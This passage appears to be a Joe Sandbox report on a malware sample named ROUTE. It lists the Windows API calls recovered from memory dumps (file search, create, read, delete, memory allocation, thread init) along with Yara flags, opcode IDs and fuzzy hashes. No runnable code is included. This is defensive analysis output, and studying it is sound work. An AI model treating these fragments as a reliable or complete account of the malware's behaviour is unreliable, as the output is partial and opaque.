100901 28380f1 100900->100901 100902 28494d0 NtClose 100900->100902 100901->100891 100902->100898 100904 284886d 100903->100904 100906 284881e 100903->100906 100908 3084650 LdrInitializeThunk 100904->100908 100905 2848892 100905->100900 100906->100900 100908->100905 100914 2849430 100915 28494a4 100914->100915 100916 284945b 100914->100916 100917 28494ba NtDeleteFile 100915->100917 100923 2841b30 100924 2841b49 100923->100924 100925 28454c0 2 API calls 100924->100925 100930 2841b66 100925->100930 100926 2841bd9 100927 2841b94 100928 284b570 RtlFreeHeap 100927->100928 100929 2841ba4 100928->100929 100930->100926 100930->100927 100931 2841bd4 100930->100931 100932 284b570 RtlFreeHeap 100931->100932 100932->100926
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0283C6E4
                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0283C71F
                                                                                • FindClose.KERNELBASE(?), ref: 0283C72A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                • Opcode ID: 0bcd0ed3e76a3e13bba6a3f69d416f9609b832d3224101b31c1df1672a9431be
                                                                                • Instruction ID: 546a45cac8f8dee51570b6d453925c0123ee6137fb0ccfffe61207a2a87c63a9
                                                                                • Opcode Fuzzy Hash: 0bcd0ed3e76a3e13bba6a3f69d416f9609b832d3224101b31c1df1672a9431be
                                                                                • Instruction Fuzzy Hash: 513172BD9002097BDB21DFA8CC85FFA77BD9B44744F104559B90CF7180DBB0AA948BA1
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(?,?,?,?,635CE8B4,?,?,?,?,?,?), ref: 028492CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 041070744bf495d413e60ee7f098dc23643cf720cfc8c4fd3fcc99ce66d5656b
                                                                                • Instruction ID: 643a976964c85c51865d588f8db2fb8ec9c6ef45640d4e9fc4b64f4d24e657cd
                                                                                • Opcode Fuzzy Hash: 041070744bf495d413e60ee7f098dc23643cf720cfc8c4fd3fcc99ce66d5656b
                                                                                • Instruction Fuzzy Hash: D331D6B9A01648AFDB14DF99D841EDEB7B9EF8C714F108209F918A7341D730A851CFA5
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,?,?,635CE8B4,?,?,?,?), ref: 02849426
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 19e5f510a2379a7b0105218b5c10e5d434f5aa5545959674cace4c4f58d775f2
                                                                                • Instruction ID: 0f816d7257cb3e7cb4ceb53c64530cb8541d20cdb86caa5d85044357b471dd50
                                                                                • Opcode Fuzzy Hash: 19e5f510a2379a7b0105218b5c10e5d434f5aa5545959674cace4c4f58d775f2
                                                                                • Instruction Fuzzy Hash: C031C6B9A00248AFDB14DF99D841EEFB7B9EF8C714F108119F918A7341D674A811CFA5
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(02831DAB,?,02847FCE,00000000,635CE8B4,00003000,?,?,?,?,?,02847FCE,02831DAB), ref: 02849708
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 291b8b0d8513af749782a9f3aaa48f50bade7b93b4a3b8851dfe6bbb34d5246b
                                                                                • Instruction ID: 8011ddff1c51fdb6875fc17288d8413022307d9f15bafa35f53709eb7df275b5
                                                                                • Opcode Fuzzy Hash: 291b8b0d8513af749782a9f3aaa48f50bade7b93b4a3b8851dfe6bbb34d5246b
                                                                                • Instruction Fuzzy Hash: 6C211E79A00249AFDB14DFA8DC41EAFB7B9EF88710F108509F918A7241D670A911CFA5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: 149bccc46e621c08124e4ae7e9c00c89c746301c5cbaa3a94d4c773a8c74d55c
                                                                                • Instruction ID: 233156cb137534584cfe3951f185f6b6b36f292297dfe4e0887d96c395a92d80
                                                                                • Opcode Fuzzy Hash: 149bccc46e621c08124e4ae7e9c00c89c746301c5cbaa3a94d4c773a8c74d55c
                                                                                • Instruction Fuzzy Hash: A911A379900608AFD620EBA8DC01FAF776DDF88710F108509FA18A7281EB7175058FA6
                                                                                APIs
                                                                                • NtClose.NTDLL(02841801,?,-665E6599,?,?,02841801,?,00009D57), ref: 02849507
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                • Instruction ID: 4ec68fd3550e94bda7ad264d9020efab5619e40d6a505bc6cdc1b3876c4ad988
                                                                                • Opcode Fuzzy Hash: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                • Instruction Fuzzy Hash: 6CE086392002147BD210EA5DDC40F9B775DDFC9710F51C055FA0CA7242DA71B9158BF5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: dc9d51e29432b38ad2765f8dc8bc1a7e6e1cc56edc9c3b4e80a952548f2beec3
                                                                                • Instruction ID: 3bb344a8f788a989aab2f9ecc85bee02522ee92ee85790cb19070857c8bbec51
                                                                                • Opcode Fuzzy Hash: dc9d51e29432b38ad2765f8dc8bc1a7e6e1cc56edc9c3b4e80a952548f2beec3
                                                                                • Instruction Fuzzy Hash: 9490023160680412B540B1588884546404597E1301B55C012E0828564C8B148A566365
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8a0a23dd6afb7af031f808bf2e7e9c01e6a3e9e7c2ce6420726b57defdee1cd6
                                                                                • Instruction ID: 7e49fbb314c9152208f4d2d651c8cee6fac480c9c534f9ac1864d53410aa5847
                                                                                • Opcode Fuzzy Hash: 8a0a23dd6afb7af031f808bf2e7e9c01e6a3e9e7c2ce6420726b57defdee1cd6
                                                                                • Instruction Fuzzy Hash: DB900261602504426540B1588804406604597E2301395C116A0958570C87188955A26D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4a665577726f639a509ec42f816fa1c642ec9556dbd7f2d9b8d3685b14011a98
                                                                                • Instruction ID: d2692d60d4cd52e08e20c902f97685c19698450e3a26c4b2205c27e3885b59d3
                                                                                • Opcode Fuzzy Hash: 4a665577726f639a509ec42f816fa1c642ec9556dbd7f2d9b8d3685b14011a98
                                                                                • Instruction Fuzzy Hash: 16900261203404036505B1588414616404A87E1201B55C022E14185A0DC62589917129
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: f37638bbc94783c88f3f38dff99808bfe234446e6a4575a7d5c9945c39709d9d
                                                                                • Instruction ID: 6e184c8aba65a86a45c62e5a210a0a05fe2e1c140ddc545354b59370c5ee7c00
                                                                                • Opcode Fuzzy Hash: f37638bbc94783c88f3f38dff99808bfe234446e6a4575a7d5c9945c39709d9d
                                                                                • Instruction Fuzzy Hash: DE90023160640C02F550B1588414746004587D1301F55C012A0428664D87558B5576A5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b8883354e33c458ae731d848dbd767e70d51c27f1d6a55ff65e8e76fac063021
                                                                                • Instruction ID: 646c4fa7089f4cc772e1e4fb01745c27175e373f309af30d9e5ab33aa7d518fc
                                                                                • Opcode Fuzzy Hash: b8883354e33c458ae731d848dbd767e70d51c27f1d6a55ff65e8e76fac063021
                                                                                • Instruction Fuzzy Hash: 4790023120644C42F540B1588404A46005587D1305F55C012A04686A4D97258E55B665
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9fb4f8587cae376b7091116dbc46acb7b237a0653affebffa166a60476d4da9b
                                                                                • Instruction ID: 1c684cc4b7a69fea1a1340bb3fb3ff02911dca8d24482b073af57a67d66ed38a
                                                                                • Opcode Fuzzy Hash: 9fb4f8587cae376b7091116dbc46acb7b237a0653affebffa166a60476d4da9b
                                                                                • Instruction Fuzzy Hash: 2E90023120240C02F580B158840464A004587D2301F95C016A0429664DCB158B5977A5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7031ba97afd52de494e9a1f66e1c05d49b1b2ed4bf89f3a0cf70049996fdabf5
                                                                                • Instruction ID: 452ac38ed84634283ae10c09f63a51ea70d1a44ee4b8fb84e8bbf04c5b5ead3c
                                                                                • Opcode Fuzzy Hash: 7031ba97afd52de494e9a1f66e1c05d49b1b2ed4bf89f3a0cf70049996fdabf5
                                                                                • Instruction Fuzzy Hash: 3A900225212404032505F5584704507008687D6351355C022F1419560CD72189616125
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: d02cc331e304b10914bf9f47893c9862514c083f6b138ddc06103fd9719ed88d
                                                                                • Instruction ID: dd725b33ca1efd26948c588e603250992806381856618f38e89b09acdb351a10
                                                                                • Opcode Fuzzy Hash: d02cc331e304b10914bf9f47893c9862514c083f6b138ddc06103fd9719ed88d
                                                                                • Instruction Fuzzy Hash: 41900225222404022545F558460450B048597D7351395C016F181A5A0CC72189656325
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 857cb886b89aa9a5c50526e18737e0b28ffe602c3943060e65d78f805390e686
                                                                                • Instruction ID: dcb74f944cc962d1b9aa328d8270b118bcbf9fda169beac85f97da6cb8ae3900
                                                                                • Opcode Fuzzy Hash: 857cb886b89aa9a5c50526e18737e0b28ffe602c3943060e65d78f805390e686
                                                                                • Instruction Fuzzy Hash: 5F90026134240842F500B1588414B060045C7E2301F55C016E1468564D8719CD52712A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 648cd47dbb655f483306f9e543e08d5c4fb2615c503914b5504ce7927581976b
                                                                                • Instruction ID: 51f5fffd1f1dad4d4bc2eb10c528b8a5c791e9f987b3b15326877e568b2cbfd1
                                                                                • Opcode Fuzzy Hash: 648cd47dbb655f483306f9e543e08d5c4fb2615c503914b5504ce7927581976b
                                                                                • Instruction Fuzzy Hash: 70900221602404426540B168C8449064045ABE2211755C122A0D9C560D865989656669
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 17c69d854d6269fb0f9acac6f6537ae54ba47a286fa18b31e3cc92a6c1ac15e1
                                                                                • Instruction ID: 634fbda9f4199b7ba5693ba49c703eff2572e3d60e4b94d33b59174e416d3dde
                                                                                • Opcode Fuzzy Hash: 17c69d854d6269fb0f9acac6f6537ae54ba47a286fa18b31e3cc92a6c1ac15e1
                                                                                • Instruction Fuzzy Hash: F1900221212C0442F600B5688C14B07004587D1303F55C116A0558564CCA1589616525
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ae0efbcf90a4e38347be6e675ac5941d05489cc887f4c8eec1425c701f73f640
                                                                                • Instruction ID: e699461ba57c6a7bb5f1f2d76d908f47c5face148bef44cf3f407811dfb3e6aa
                                                                                • Opcode Fuzzy Hash: ae0efbcf90a4e38347be6e675ac5941d05489cc887f4c8eec1425c701f73f640
                                                                                • Instruction Fuzzy Hash: 2B90022160240902F501B1588404616004A87D1241F95C023A1428565ECB258A92B135
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: cae60d21fad9ada50a9845812d70d1ab4c29287f0f2f39e2533fb4134a2f5d1f
                                                                                • Instruction ID: ceef9929952ba932f5cb2d7b618627d1f6e5b8118031ea7e059d918e16da0e1d
                                                                                • Opcode Fuzzy Hash: cae60d21fad9ada50a9845812d70d1ab4c29287f0f2f39e2533fb4134a2f5d1f
                                                                                • Instruction Fuzzy Hash: F490026120280803F540B5588804607004587D1302F55C012A2468565E8B298D517139
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: dcb1064a59170bacf996a1958ba66e3f287532552a4e407039af2fe59c7e2176
                                                                                • Instruction ID: 100052d3c28b0fa9b7b37b1990b11b77bf7a5d3d834e0dd6658caaf69d9137dd
                                                                                • Opcode Fuzzy Hash: dcb1064a59170bacf996a1958ba66e3f287532552a4e407039af2fe59c7e2176
                                                                                • Instruction Fuzzy Hash: DA90022921340402F580B158940860A004587D2202F95D416A0419568CCA1589696325
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c15c1edf5b9d785afbdce9f1f7ac00775e7740aaa9f53a98f97e770f1f19f0d0
                                                                                • Instruction ID: 60c633c4248b14e851e896c2e20d5dd0f3bc5a3d1429b0991385ced8c3ac8e1c
                                                                                • Opcode Fuzzy Hash: c15c1edf5b9d785afbdce9f1f7ac00775e7740aaa9f53a98f97e770f1f19f0d0
                                                                                • Instruction Fuzzy Hash: 8490022130240403F540B15894186064045D7E2301F55D012E0818564CDA1589566226
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 256c05e683f7d2002990e83b29c6427cebb72b597dab495d00fc61c21a0a38cf
                                                                                • Instruction ID: 72325a24eadad66681635e63def9d0a7f4ae04d27221e471bdd0c0233a069e9f
                                                                                • Opcode Fuzzy Hash: 256c05e683f7d2002990e83b29c6427cebb72b597dab495d00fc61c21a0a38cf
                                                                                • Instruction Fuzzy Hash: AB900221243445527945F1588404507404697E1241795C013A1818960C86269956E625
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b8b3e2889c1bee6ef68dc53b59368a3b8fe4c0e17b4681ccd3eb71d64ec2a8ab
                                                                                • Instruction ID: 7ba60b2ade53503da8df546aee080b930dc0a2a94a096fe1655a6b492a2c75e6
                                                                                • Opcode Fuzzy Hash: b8b3e2889c1bee6ef68dc53b59368a3b8fe4c0e17b4681ccd3eb71d64ec2a8ab
                                                                                • Instruction Fuzzy Hash: 6690023120240813F511B1588504707004987D1241F95C413A0828568D97568A52B125
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2e622b8032220c2f7b94ed087f6111bba51c936df54d6237aaaa21fdaebc5c5c
                                                                                • Instruction ID: c61be46f92d55316239fd3ba37484073c769ea5808c5ff9280ab6e86569b2cbb
                                                                                • Opcode Fuzzy Hash: 2e622b8032220c2f7b94ed087f6111bba51c936df54d6237aaaa21fdaebc5c5c
                                                                                • Instruction Fuzzy Hash: 5C90023120240C42F500B1588404B46004587E1301F55C017A0528664D8715C9517525
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5c2a93808a475f7f6a73c4e8d88ecfd1e15b05557bad1322c0c367da7076bbff
                                                                                • Instruction ID: 3a0db6aaf77b64570ed88e34b1d612f7a3fd2cab6aaecf81e587723745b08f32
                                                                                • Opcode Fuzzy Hash: 5c2a93808a475f7f6a73c4e8d88ecfd1e15b05557bad1322c0c367da7076bbff
